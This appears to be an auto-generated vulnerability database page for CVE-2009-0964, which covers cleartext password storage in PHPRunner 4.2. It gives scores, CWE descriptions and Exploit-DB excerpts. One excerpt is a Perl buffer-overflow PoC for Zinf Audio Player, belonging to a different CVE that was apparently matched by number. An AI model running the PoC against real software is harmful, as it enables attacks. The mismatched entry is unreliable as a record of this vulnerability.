CVE-2009-0964
Published 2009-03-19
Priority P3 · 48 · high · 7.5 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:N / A:N
EXPLOIT
EPSS: 1.92% (77.4th percentile)
UserView_list.php in PHPRunner 4.2, and possibly earlier, stores passwords in cleartext in the database, which allows attackers to gain privileges. NOTE: this can be leveraged with a separate SQL injection vulnerability to obtain passwords remotely without authentication.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| xlinesoft | phprunner | <= 4.2 | — |
CVSS provenance
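| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 7.5 | HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| nvd | v2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N |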
No detection rules found.
Exploit-DB
PHPRunner 4.2 - 'SearchOption' Blind SQL Injection
exploitdb·2009-03-17
CVE-2009-0964 PHPRunner 4.2 - 'SearchOption' Blind SQL Injection
---
##########################www.BugReport.ir########################################
#
# AmnPardaz Security Research Team
#
# Title: PHPRunner SQL Injection
# Vendor: http://www.xlinesoft.com
# Vulnerable Version: 4.2 (prior versions also may be affected)
# Exploitation: Remote with browser
# Original Advisory: http://www.bugreport.ir/index_63.htm
# Fix: N/A
###################################################################################
####################
- Description:
####################
PHPRunner builds visually appealing web interface for popular databases. Your web site visitors will be able to easily search, add, edit, delete and export
data in MySQL, Oracle, SQL Server, MS Access, and Postgre databases.
###############
Exploit-DB
Zinf Audio Player 2.2.1 - '.pls' Stack Overflow (PoC)
exploitdb·2009-01-27
CVE-2004-0964 Zinf Audio Player 2.2.1 - '.pls' Stack Overflow (PoC)
---
#!/usr/bin/perl
# Discovered & Written by : Hakxer
# Home : www.sec-geeks.com
# Program : http://www.zinf.org/ ../http://prdownloads.sourceforge.net/zinf/zinf-setup-2.2.1.exe
# Zinf Audio Player 2.2.1 (PLS FILE) Buffer Overflow PoC
my $chars="\x90" x 2000;
open(MYFILE,'>>hakxer.pls');
print MYFILE $chars;
close(MYFILE);
print " PoC Created .. Hakxer [ Sec-Geeks.com ] EgY Coders Team";
# milw0rm.com [2009-01-27]
No writeups or analysis indexed.
CWE
Missing Encryption of Sensitive Data
mitre_cwe
CWE-311: Missing Encryption of Sensitive Data
The product does not encrypt sensitive or critical information before storage or transmission.
Modes of Introduction:
Phase: Architecture and Design
Note: OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase.
Phase: Operation
Common Consequences:
Scope: Confidentiality. Impact: Read Application Data. If the application does not use a secure channel, such as SSL, to exchange sensitive information, it is possible for an attacker with access to the network traffic to sniff packets from the connection and uncover the data. This attack is not technically difficult, but does require physical access to some portion of the network over which the sensitive data travels. This access is usually somewhe
CWE
Cleartext Storage of Sensitive Information
mitre_cwe
CWE-312: Cleartext Storage of Sensitive Information
The product stores sensitive information in cleartext within a resource that might be accessible to another control sphere.
Modes of Introduction:
Phase: Architecture and Design
Note: OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase.
Common Consequences:
Scope: Confidentiality. Impact: Read Application Data. An attacker with access to the system could read sensitive information stored in cleartext (i.e., unencrypted). Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information.
Detection Methods:
Automated Static Analysis: Automated static analysis, commonly referred to as Stat
http://osvdb.org/52804
http://www.bugreport.ir/index_63.htm
http://www.securityfocus.com/archive/1/501894/100/0/threaded
http://www.vupen.com/english/advisories/2009/0750
https://exchange.xforce.ibmcloud.com/vulnerabilities/49279
https://www.exploit-db.com/exploits/8226